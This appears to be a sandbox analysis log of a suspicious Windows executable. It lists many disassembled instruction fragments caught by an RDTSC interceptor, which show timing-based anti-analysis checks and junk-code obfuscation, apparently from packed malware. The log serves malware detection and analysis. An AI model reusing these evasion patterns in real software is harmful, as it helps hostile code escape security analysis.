Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7461 second address: AB7465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7465 second address: AB746B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB746B second address: AB746F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB754B second address: AB754F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB754F second address: AB75C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6204BE6481h 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F6204BE6478h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov cl, dl 0x0000002b mov edi, dword ptr [ebp+122D3431h] 0x00000031 push 00000000h 0x00000033 call 00007F6204BE6479h 0x00000038 jl 00007F6204BE647Eh 0x0000003e jng 00007F6204BE6478h 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F6204BE6487h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB75C3 second address: AB75C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB75C9 second address: AB75CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB75CD second address: AB75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007F620450A75Eh 0x00000012 jmp 00007F620450A758h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB75FF second address: AB7603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7603 second address: AB7607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7607 second address: AB760D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB760D second address: AB7613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB772A second address: AB7762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6204BE6476h 0x00000009 jbe 00007F6204BE6476h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov esi, 53A310AEh 0x0000001a push 00000000h 0x0000001c jnc 00007F6204BE647Bh 0x00000022 push 9CF6458Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c jnc 00007F6204BE6476h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7762 second address: AB77FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6309BAF4h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F620450A748h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D31D9h], edx 0x00000030 mov dword ptr [ebp+1245A119h], edx 0x00000036 push 00000003h 0x00000038 jg 00007F620450A748h 0x0000003e push 00000000h 0x00000040 sbb esi, 10BDC8D0h 0x00000046 push 00000003h 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007F620450A748h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000018h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 pushad 0x00000063 mov bh, 81h 0x00000065 mov eax, dword ptr [ebp+122D2E9Ah] 0x0000006b popad 0x0000006c cld 0x0000006d call 00007F620450A749h 0x00000072 push ebx 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB77FB second address: AB77FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB77FF second address: AB7850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F620450A754h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edi 0x00000012 jmp 00007F620450A74Dh 0x00000017 pop edi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jnl 00007F620450A746h 0x00000023 jmp 00007F620450A756h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7850 second address: AB785A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB785A second address: AB78A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 jno 00007F620450A748h 0x00000017 popad 0x00000018 pop eax 0x00000019 mov edx, dword ptr [ebp+122D2CD2h] 0x0000001f lea ebx, dword ptr [ebp+1245C291h] 0x00000025 jne 00007F620450A746h 0x0000002b xchg eax, ebx 0x0000002c jnc 00007F620450A750h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jbe 00007F620450A746h 0x0000003c jbe 00007F620450A746h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9DB5 second address: AA9DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F6204BE6489h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD57AF second address: AD57C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F620450A74Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5937 second address: AD593B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5AE9 second address: AD5B1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F620450A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F620450A756h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F620450A74Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5B1C second address: AD5B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5B22 second address: AD5B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F620450A74Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5E7F second address: AD5E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5E9B second address: AD5EA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5EA2 second address: AD5EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD62F9 second address: AD62FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD62FD second address: AD6328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6204BE647Ch 0x0000000c jns 00007F6204BE6476h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6204BE6487h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACC358 second address: ACC370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A74Ch 0x00000009 jne 00007F620450A746h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E164 second address: A9E169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E169 second address: A9E173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F620450A746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6E95 second address: AD6EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6204BE6476h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD713F second address: AD714D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jne 00007F620450A746h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD714D second address: AD7152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7152 second address: AD715C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F620450A74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD715C second address: AD7176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F6204BE647Bh 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7176 second address: AD717A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD717A second address: AD7180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD75B6 second address: AD75BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD75BA second address: AD75D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6204BE6489h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8511 second address: AD852E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADCF68 second address: ADCF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F6204BE6476h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4D24 second address: AA4D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE4DAF second address: AE4DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F6204BE6476h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE4DBE second address: AE4DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE528A second address: AE52B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE647Bh 0x00000009 jng 00007F6204BE6476h 0x0000000f jmp 00007F6204BE647Dh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE53F9 second address: AE53FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE77A3 second address: AE77AD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE77AD second address: AE77B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE77B3 second address: AE77B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7878 second address: AE78BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F620450A74Bh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F620450A75Eh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 je 00007F620450A754h 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F620450A746h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE78BA second address: AE78C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE78C8 second address: AE78CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE78CF second address: AE7958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jo 00007F6204BE648Ch 0x00000011 jmp 00007F6204BE6486h 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F6204BE6478h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 clc 0x00000032 call 00007F6204BE6479h 0x00000037 jo 00007F6204BE6483h 0x0000003d jmp 00007F6204BE647Dh 0x00000042 push eax 0x00000043 je 00007F6204BE648Ah 0x00000049 jmp 00007F6204BE6484h 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7958 second address: AE7973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A756h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7FCF second address: AE7FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F6204BE6476h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE86BC second address: AE872C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F620450A748h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F620450A74Dh 0x0000002b mov si, FC39h 0x0000002f pop edi 0x00000030 mov esi, 54FBB201h 0x00000035 nop 0x00000036 ja 00007F620450A752h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 push esi 0x00000041 pop esi 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE872C second address: AE8736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE89A5 second address: AE89A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE89A9 second address: AE89B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6204BE6476h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8ABD second address: AE8AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F620450A746h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8AC8 second address: AE8AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F6204BE6480h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8D12 second address: AE8D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8D18 second address: AE8D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8D1C second address: AE8D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F620450A748h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D1E27h], edx 0x0000002c mov si, di 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE930C second address: AE9310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9310 second address: AE9370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F620450A748h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F620450A74Ch 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F620450A748h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 xchg eax, ebx 0x00000046 pushad 0x00000047 jbe 00007F620450A74Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9370 second address: AE9396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE6480h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F6204BE647Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DAE second address: AE9DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9C22 second address: AE9C41 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6204BE647Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F6204BE647Ch 0x00000013 jc 00007F6204BE6476h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DB4 second address: AE9E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F620450A74Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D342Ch], edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F620450A748h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov di, 711Eh 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 jnc 00007F620450A746h 0x0000003d jmp 00007F620450A757h 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 pop esi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAEF2 second address: AEAEF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEC35B second address: AEC37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jne 00007F620450A746h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jp 00007F620450A748h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F620450A746h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEC37B second address: AEC3D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+124582CDh], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F6204BE6478h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F6204BE6478h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 xor edi, 0C166404h 0x0000004c xchg eax, ebx 0x0000004d jo 00007F6204BE6484h 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
